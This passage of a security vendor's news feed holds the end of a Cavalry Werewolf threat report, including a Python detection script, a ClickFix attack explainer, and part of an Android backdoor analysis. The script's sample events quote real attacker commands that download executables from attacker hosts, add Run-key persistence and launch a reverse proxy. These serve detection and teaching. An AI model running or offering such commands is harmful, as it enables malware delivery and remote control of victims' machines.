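&lt;p&gt;The discovery, download, persistence and launch commands listed above translate directly into process-creation hunting logic. The Python script below is an added example, not code from the Doctor Web report or from its IOC repository: it runs a small rule set over constructed Sysmon-style process events (parent image, image, command line) that mirror the quoted commands, and flags downloads into the Public staging folders, the HKCU Run key, the ReverseSocks5 &lt;span class="string"&gt;-connect&lt;/span&gt; launch of &lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;, executables started from those folders, and a bare launch of &lt;span class="string"&gt;aspnet_compiler.exe&lt;/span&gt; from an untrusted parent, the injection target described for &lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;. The sample events, user names and paths are constructed, and the aspnet_compiler heuristic is an assumption to tune per environment.&lt;/p&gt;

```python
import json
import re

# Constructed sample events in a Sysmon Event ID 1 (process creation) shape,
# trimmed to three fields. The suspicious command lines mirror the ones the
# report quotes (addresses refanged); the first two events are benign and
# invented for contrast. User names and install paths are hypothetical.
SAMPLE_EVENTS = r"""
{"parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\notepad.exe", "command_line": "notepad.exe notes.txt"}
{"parent_image": "C:\\Program Files\\Microsoft Visual Studio\\2022\\MSBuild\\Current\\Bin\\MSBuild.exe", "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe", "command_line": "aspnet_compiler.exe -v / -p C:\\src\\web -c C:\\out"}
{"parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\bitsadmin.exe", "command_line": "bitsadmin /transfer www /download http://195.2.79.245/rever.exe C:\\users\\public\\pictures\\rev3.exe"}
{"parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\reg.exe", "command_line": "REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Service /t REG_SZ /d C:\\users\\public\\pictures\\win.exe /f"}
{"parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\users\\public\\libraries\\revv2.exe", "command_line": "C:\\users\\public\\libraries\\revv2.exe -connect 78.128.112.209:10443"}
{"parent_image": "C:\\Users\\ivanov\\Downloads\\pickmum1.exe", "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe", "command_line": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe"}
{"parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell -Command Invoke-WebRequest -Uri 'https://sss.qwadx.com/revv3.exe' -OutFile 'C:\\users\\public\\pictures\\rev.exe'"}
{"parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\curl.exe", "command_line": "curl -o C:\\users\\public\\pictures\\rev.exe http://195.2.79.245/code.exe"}
"""

# World-writable Public folders the report names as the group's staging area.
STAGING_DIRS = re.compile(
    r"c:\\users\\public\\(pictures|libraries|downloads)\\", re.IGNORECASE)
# Built-in downloaders the report observed: bitsadmin, curl, Invoke-WebRequest.
DOWNLOADERS = re.compile(
    r"bitsadmin(\.exe)?\s+/transfer|curl(\.exe)?\s.*-o\s|invoke-webrequest.*-outfile",
    re.IGNORECASE)
# HKCU Run key persistence via reg.exe (T1547.001).
RUN_KEY = re.compile(
    r"reg(\.exe)?\s+add\s+hkcu\\software\\microsoft\\windows\\currentversion\\run\b",
    re.IGNORECASE)
# ReverseSocks5 agent started with "-connect host:port".
REVERSE_CONNECT = re.compile(r"\.exe\s+-connect\s+\S+:\d+", re.IGNORECASE)
# Where a legitimate parent of aspnet_compiler.exe lives (heuristic assumption).
TRUSTED_PARENT_PREFIXES = ("c:\\windows\\", "c:\\program files")


def evaluate(event):
    """Return the names of the rules that fire for one process-creation
    event, in a fixed order so callers can assert on the result."""
    cmd = event.get("command_line", "")
    image = event.get("image", "")
    parent = event.get("parent_image", "")
    hits = []
    if DOWNLOADERS.search(cmd) and STAGING_DIRS.search(cmd):
        hits.append("lolbin_download_to_public_staging")
    if RUN_KEY.search(cmd):
        hits.append("hkcu_run_key_persistence")
    if REVERSE_CONNECT.search(cmd):
        hits.append("reverse_socks5_connect")
    if STAGING_DIRS.search(image):
        hits.append("exec_from_public_staging")
    # Trojan.Inject5.57968 runs its payload inside aspnet_compiler.exe. Build
    # tooling starts that compiler from a trusted path and with arguments; a
    # bare launch from an untrusted parent is worth a look (heuristic).
    if image.lower().endswith("\\aspnet_compiler.exe"):
        bare_launch = len(cmd.split()) in (0, 1)
        trusted_parent = parent.lower().startswith(TRUSTED_PARENT_PREFIXES)
        if bare_launch and not trusted_parent:
            hits.append("aspnet_compiler_suspicious_launch")
    return hits


def triage(events_text):
    """Parse JSON-lines events and return only those with at least one hit."""
    alerts = []
    for line in events_text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        rules = evaluate(event)
        if rules:
            alerts.append({"image": event["image"], "rules": rules})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["image"], ":", ", ".join(alert["rules"]))
```

&lt;p&gt;The rules are deliberately narrow. A single executable in the Public folders is a lead; a download into those folders followed on the same host by a Run key that points back into them is the sequence the report describes and a strong signal.&lt;/p&gt;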
&lt;h3&gt;Features of the Cavalry Werewolf hacker group&lt;/h3&gt;
&lt;p&gt;The following features of the Cavalry Werewolf hacker group can be highlighted:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;they prefer using open-source software, both in its original form and as the basis for developing their own tools;&lt;/li&gt;
    &lt;li&gt;their main tools are various reverse-shell backdoors that allow commands to be executed remotely in infected systems;&lt;/li&gt;
    &lt;li&gt;they can embed malicious code into initially harmless programs;&lt;/li&gt;
    &lt;li&gt;they often use the Telegram API to control infected computers;&lt;/li&gt;
    &lt;li&gt;they use compromised email addresses and carry out phishing campaigns, sending emails under the guise of state institutions to distribute the first infection stage;&lt;/li&gt;
    &lt;li&gt;they use the directories &lt;span class="string"&gt;C:\users\public\pictures&lt;/span&gt;, &lt;span class="string"&gt;C:\users\public\libraries&lt;/span&gt;, and &lt;span class="string"&gt;C:\users\public\downloads&lt;/span&gt; to stage subsequent infection stages on the target device.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For detailed technical descriptions of identified Cavalry Werewolf tools, please refer to the PDF version of the study or visit the Doctor Web virus library.&lt;/p&gt;
&lt;p&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.ReverseProxy.1&amp;lng=en"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.ReverseShell.10&amp;lng=en"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.RShell.169&amp;lng=en"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.ShellNET.1&amp;lng=en"&gt;&lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.ShellNET.2&amp;lng=en"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.Siggen2.5463&amp;lng=en"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BackDoor.Tunnel.41&amp;lng=en"&gt;&lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=BAT.DownLoader.1138&amp;lng=en"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Siggen31.54011&amp;lng=en"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Clipper.808&amp;lng=en"&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.FileSpyNET.5&amp;lng=en"&gt;&lt;b&gt;Trojan.FileSpyNET.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Inject5.57968&amp;lng=en"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Packed2.49708&amp;lng=en"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Packed2.49862&amp;lng=en"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;h3&gt;MITRE matrix&lt;/h3&gt;

&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Stage&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Technique&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;Initial access&lt;/td&gt;
            &lt;td&gt;Spearphishing attachment (T1566.001)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Execution&lt;/td&gt;
            &lt;td&gt;User execution (T1204)&lt;br /&gt;&lt;br /&gt;PowerShell (T1059.001)&lt;br /&gt;&lt;br /&gt;Windows Command Shell (T1059.003)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Persistence&lt;/td&gt;
            &lt;td&gt;Registry Run Keys / Startup Folder (T1547.001)&lt;br /&gt;&lt;br /&gt;BITS Jobs (T1197)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Privilege Escalation&lt;/td&gt;
            &lt;td&gt;Bypass User Account Control (T1548.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Defense Evasion&lt;/td&gt;
            &lt;td&gt;BITS Jobs (T1197)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Command and Control&lt;/td&gt;
            &lt;td&gt;External Proxy (T1090.002)&lt;br /&gt;&lt;br /&gt;Bidirectional Communication (T1102.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Exfiltration&lt;/td&gt;
            &lt;td&gt;Exfiltration Over C2 Channel (T1041)&lt;br /&gt;&lt;br /&gt;Exfiltration Over Web Service (T1567)&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Cavalry%20Werewolf/README.adoc" target="_blank"&gt;Indicators of compromise&lt;/a&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15074&amp;lng=en</guid><title>Understanding the ClickFix attack</title><link>https://news.drweb.com/show/?i=15074&amp;lng=en&amp;c=23</link><pubDate>Fri, 24 Oct 2025 10:52:52 GMT</pubDate><description>&lt;p style="text-align:justify;"&gt;&lt;strong&gt;Users all over the world are getting increasingly worried as the number of ClickFix security incidents continues to grow at an alarming rate. Attackers are using this social engineering technique to coax users into running malicious code on their devices.&lt;/strong&gt;&lt;/p&gt;&lt;p style="text-align:justify;"&gt;An attack commences when someone winds up on a compromised or bogus site and sees a warning message informing them that, for example, the webpage can't be displayed properly because of a browser error or that an update is required.&amp;nbsp;&lt;br&gt;Normally, the message is supplemented by a “Fix”, “Check” or “Update” button. Malicious code is copied into the clipboard automatically as soon as the button appears on the screen—there’s no need to even press it. The user is then prompted to paste this code into a command prompt or the “Run” dialogue box. As soon as that happens, a malicious program is installed and launched. 
And since the action has been initiated by the user, the antivirus often does not intervene.&lt;/p&gt;&lt;p style="text-align:justify;"&gt;&lt;strong&gt;Below we provide a simplified recreation of a ClickFix attack.&lt;/strong&gt;&lt;/p&gt;&lt;p style="text-align:justify;"&gt;When users load and view content, a warning message suddenly appears in the browser, informing them that an issue caused by a recent browser update is preventing the content from being displayed properly.&lt;/p&gt;&lt;figure class="image"&gt;&lt;img style="aspect-ratio:648/328;" src="https://st.drweb.com/static/f2_admin/%D1%80%D0%B8%D1%811_isHarak.png" width="648" height="328"&gt;&lt;/figure&gt;&lt;p style="text-align:justify;"&gt;The message suggests that the user perform these specific actions to resolve it:&lt;/p&gt;&lt;ul style="list-style-type:disc;"&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Click the “Fix it!” button.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Right-click on the Windows Start button.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;In the program list, locate Windows PowerShell and open it with administrator permissions.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Right-click to paste the clipboard contents into the terminal window and run the command.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p style="text-align:justify;"&gt;As the user presses the button, a malicious script gets copied to the clipboard to be run in the terminal window.&lt;/p&gt;&lt;figure class="image"&gt;&lt;img style="aspect-ratio:601/166;" src="https://st.drweb.com/static/f2_admin/%D1%80%D0%B8%D1%812_xW9xNSj.png" width="601" height="166"&gt;&lt;/figure&gt;&lt;p style="text-align:justify;"&gt;The script establishes a remote connection to a C2 infrastructure that the perpetrators use to remotely control compromised systems.&amp;nbsp;&lt;br&gt;In this case, the device gets connected to a remote C2 host, and then the payload is downloaded 
to the user's computer. After that, the malicious executable designed to modify the hosts file is launched, and the running script is ended.&amp;nbsp;&lt;br&gt;&lt;strong&gt;Thanks to its preventive protection technologies, Dr.Web is able to detect the threat as soon as the script attempts to start the executable. &amp;nbsp;&lt;/strong&gt;&lt;br&gt;A fake CAPTCHA is another ruse commonly used in ClickFix attacks. &amp;nbsp;A supposedly legitimate CAPTCHA verification box appears on the screen, and in the meantime, malicious code is covertly copied to the clipboard. By engaging users in interacting with malicious content under the pretext of verifying that they’re a real person, the perpetrators make it more likely for the attack to succeed.&lt;/p&gt;&lt;figure class="image"&gt;&lt;img style="aspect-ratio:931/428;" src="https://st.drweb.com/static/f2_admin/photo_2025-10-22_14-34-44_ppPWSSV.jpg" width="931" height="428"&gt;&lt;/figure&gt;&lt;p style="text-align:justify;"&gt;The CAPTCHA dialogue is then replaced by instructions for additional verification steps.&lt;/p&gt;&lt;figure class="image"&gt;&lt;img style="aspect-ratio:912/647;" src="https://st.drweb.com/static/f2_admin/photo_2025-10-22_14-34-42_vXyQsnu.jpg" width="912" height="647"&gt;&lt;/figure&gt;&lt;p style="text-align:justify;"&gt;By completing them, the unsuspecting user runs a malicious script that opens up a remote access route for the attackers.&lt;br&gt;&lt;br&gt;&lt;strong&gt;Why ClickFix attacks are hard to expose&lt;/strong&gt;&lt;/p&gt;&lt;p style="text-align:justify;"&gt;When a user clicks a button on a bogus site, there is not yet any malicious pattern for an antivirus to detect. 
At first, all the actions appear quite legitimate: the user copies and pastes commands with their own hands and runs them—seemingly going through regular system routines.&amp;nbsp;&lt;br&gt;The detection occurs later—when a malicious file is launched or if the script attempts to inject malicious code into other processes in the system. That’s when an antivirus sees the danger and eliminates it. In other words, protection technologies only spring into action at the post-exploitation phase when the malware is already performing its tasks by disrupting other processes or is behaving strangely.&amp;nbsp;&lt;br&gt;Usually, by this time, the attacker has been able to connect to the victim's system and the payload is already deployed and can disguise itself as a legitimate process.&amp;nbsp;&lt;br&gt;At this stage, the attacker can:&lt;/p&gt;&lt;ul style="list-style-type:disc;"&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Elevate their privileges,&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Collect data,&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Navigate through the network,&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Attempt to disable the antivirus.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p style="text-align:justify;"&gt;On top of that, the malicious code can also be encrypted or obfuscated to make it less recognisable by conventional security routines.&lt;/p&gt;&lt;p style="text-align:justify;"&gt;&lt;strong&gt;Why it is important to act as early as possible&lt;/strong&gt;&lt;/p&gt;&lt;p style="text-align:justify;"&gt;In the case of ClickFix incidents, preventing attackers from connecting to the system remotely can be as vital as responding to the actual threat. 
The extra security measures that may help accomplish this include:&lt;/p&gt;&lt;ul style="list-style-type:disc;"&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Examining the clipboard contents whenever a suspicious message that includes commands (such as PowerShell scripts) appears in the browser.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Analysing traffic and suspicious attempts to establish a remote connection.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style="text-align:justify;"&gt;Teaching users how to recognise social engineering techniques by examining real attack scenarios.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15076&amp;lng=en</guid><title>Baohuo, the gray eminence. Android backdoor hijacks Telegram accounts, gaining complete control over them</title><link>https://news.drweb.com/show/?i=15076&amp;lng=en&amp;c=23</link><pubDate>Thu, 23 Oct 2025 10:32:20 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;October 23, 2025&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor Web has identified a dangerous backdoor, &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, in maliciously modified versions of the Telegram X messenger. In addition to being able to steal confidential data, including user logins and passwords, as well as chat histories, this malware has a number of unique features. For example, to prevent itself from being detected and to cover up the fact that an account has been compromised, &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; can conceal connections from third-party devices in the list of active Telegram sessions. 
Moreover, it can add and remove the user from Telegram channels and also join and leave chats on behalf of the victim, while concealing these actions as well. In fact, with this backdoor’s assistance, malicious actors gain full control over the victim’s account and the messenger functionality, while the trojan itself is a tool for boosting the number of subscribers in Telegram channels. Cybercriminals control the backdoor in different ways, one of which is via the Redis database; such a control mechanism is something that has not been seen previously in Android threats. According to our experts’ estimates, the number of devices infected with &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; has exceeded 58,000.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;started being distributed back in mid-2024, as evidenced by earlier modifications found during its analysis. The main method for delivering this backdoor to target devices is through in-app ads in mobile programs. Potential victims are shown ads that encourage them to install the Telegram X messenger. When clicking on such banners, users are redirected to malicious websites from which the trojan APK file is downloaded.&lt;/p&gt;&lt;p&gt;These sites are designed to look like an app catalog, while the messenger itself is positioned on them as a platform for conveniently finding a partner for communication and dating. This is indicated by banners with overlaid advertising text about “free video chats” and invitations to “talk” (for instance, disguised as screenshots of the video call window) as well as by reviews from supposedly happy users that the threat actors actually composed. 
It should be noted that these webpages have functionality for selecting the displayed language, but the images themselves do not change.&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/october/android-backdoor-baohuo/01_Android.Backdoor.Baohuo.1.origin_web.png"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/october/android-backdoor-baohuo/01_Android.Backdoor.Baohuo.1.origin_web.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style="text-align:center;"&gt;&lt;i&gt;One of the malicious sites from which the trojan version of Telegram X is downloaded. Potential victims are offered the chance to install an app where, according to “reviews”, it is easy to find a partner for communication and dating&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Currently, cybercriminals have prepared standard templates with banners in only two languages—Portuguese, for users from Brazil, and Indonesian. Thus, Brazilian and Indonesian audiences are the main target for the attackers. At the same time, it is possible that over time, the threat actors’ interest will extend to users from other countries.&lt;/p&gt;&lt;p&gt;Studying the attackers’ network infrastructure allowed us to determine the scale of their activity. On average, Doctor Web’s malware analysts observe about 20,000 active connections of &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;. At the same time, the total number of infected devices has exceeded 58,000. 
Around 3,000 different models of smartphones, tablets, TV box sets, and even cars with Android-based on-board computers have been infected.&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/october/android-backdoor-baohuo/02_Android.Backdoor.Baohuo.1.origin_map_en.png"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/october/android-backdoor-baohuo/02_Android.Backdoor.Baohuo.1.origin_map_en.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style="text-align:center;"&gt;&lt;i&gt;Countries with the highest number of devices infected with&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; (according to Doctor Web’s anti-virus laboratory)&lt;/i&gt;&lt;/p&gt;&lt;p&gt;However, malicious websites are not the only source for &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;’s distribution. Our experts have also detected it in third-party app catalogs, including APKPure, ApkSum, and AndroidP. Additionally, in the APKPure app store, the malware is posted on behalf of the official messenger developer, despite the fact that the digital signatures of the original version and the trojan modification are different. 
We have notified the online platforms where the trojanized versions of Telegram X were found.&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/october/android-backdoor-baohuo/03_Android.Backdoor.Baohuo.1.origin_apkpute_patched.png"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/october/android-backdoor-baohuo/03_Android.Backdoor.Baohuo.1.origin_apkpute_patched.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style="text-align:center;"&gt;&lt;i&gt;The modified Telegram X with&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; implanted in it was distributed through APKPure on behalf of the messenger’s genuine developer&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Doctor Web’s anti-virus laboratory discovered several&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; variations, which can be conditionally divided into 3 main modification groups:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;versions where the threat actors embedded the backdoor into the main executable DEX file of the messenger;&lt;/li&gt;&lt;li&gt;versions where the backdoor is dynamically loaded in the form of a patch into the executable DEX file using the LSPatch tool;&lt;/li&gt;&lt;li&gt;versions where the backdoor is located in a separate DEX file in the app’s resources directory and loaded dynamically.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Regardless of the modification type,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; initializes when the messenger is launched. The messenger itself remains functional, and for users it looks like a regular program. 
In reality, however, malicious actors have complete control over it through the backdoor and can even alter the logic of its operation.&lt;/p&gt;&lt;p&gt;When cybercriminals need to perform an action that does not require interfering with the app’s main functionality, they use pre-prepared “mirrors” of the necessary messenger methods. For example, mirrors can be used to display phishing messages in windows that look indistinguishable from real Telegram X windows.&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;i&gt;Methods are separate blocks of code in the structure of Android programs that are responsible for performing certain tasks.&lt;/i&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;If the action is not standard for the messenger, then the Xposed framework is used. It directly changes a certain functionality of the app via dynamic method modification. In particular, it can be used to hide certain chats and authorized devices as well as to steal the clipboard contents.&lt;/p&gt;&lt;p&gt;The main difference between the earlier versions of the malicious program and the current ones is in how the malware is controlled. Older versions communicated with cybercriminals and received commands from them via a C2 server, which is a traditional channel. However, over time, malware writers added to&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; the ability to receive additional commands that come from the Redis database, thus expanding its functionality. At the same time, they also provided for the duplication of new commands through a regular C2 server in case the database becomes unavailable. 
This is the first known case of using Redis to control Android malware.&lt;/p&gt;&lt;p&gt;When launched,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; connects to the initial C2 server to download a configuration that, among other parameters, contains data to connect to Redis. Through this database, threat actors not only send specific commands to the malicious app but also update the trojan’s settings. For example, they assign current addresses for the C2 server and the NPS server. Malware writers use the latter to connect infected devices to their internal network (intranet) and turn them into a proxy for accessing the Internet.&lt;/p&gt;&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;regularly connects to the C2 server via API requests and can receive the following tasks:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;upload incoming SMS and contacts from the infected device’s phonebook to the C2 server;&lt;/li&gt;&lt;li&gt;upload the contents of the clipboard to the C2 server when minimizing the messenger and restoring its window;&lt;/li&gt;&lt;li&gt;receive URLs from the C2 server to display ads, as well as the server address from which the trojan’s update in the form of a DEX file will be downloaded;&lt;/li&gt;&lt;li&gt;receive encryption keys that are used when certain data is uploaded to the C2 server (for instance, the clipboard contents);&lt;/li&gt;&lt;li&gt;request a group of commands for collecting information about installed apps, the message history, and contacts from the device’s phonebook, and about the devices logged into Telegram (this request is executed every 30 minutes);&lt;/li&gt;&lt;li&gt;request a URL from the C2 server to download an update for Telegram X;&lt;/li&gt;&lt;li&gt;request from the C2 server a 
configuration which is then saved as a JSON file;&lt;/li&gt;&lt;li&gt;request information about the Redis database;&lt;/li&gt;&lt;li&gt;upload information about the device to the C2 server whenever messenger network activity is detected;&lt;/li&gt;&lt;li&gt;receive from the C2 server a list of bots that are to be added to the Telegram contact list;&lt;/li&gt;&lt;li&gt;upload the following information to the C2 server every 3 minutes: the current app’s permissions, the device’s state (whether its screen is on or off, whether the app is active), and the mobile phone number with the name and password for the Telegram account;&lt;/li&gt;&lt;li&gt;every minute, request commands in the same format as the commands from the Redis database.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;To receive commands via Redis,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; connects to the attackers’ corresponding server where it registers its own sub-channel. Threat actors connect to this sub-channel and post tasks in it, which the backdoor then executes. 
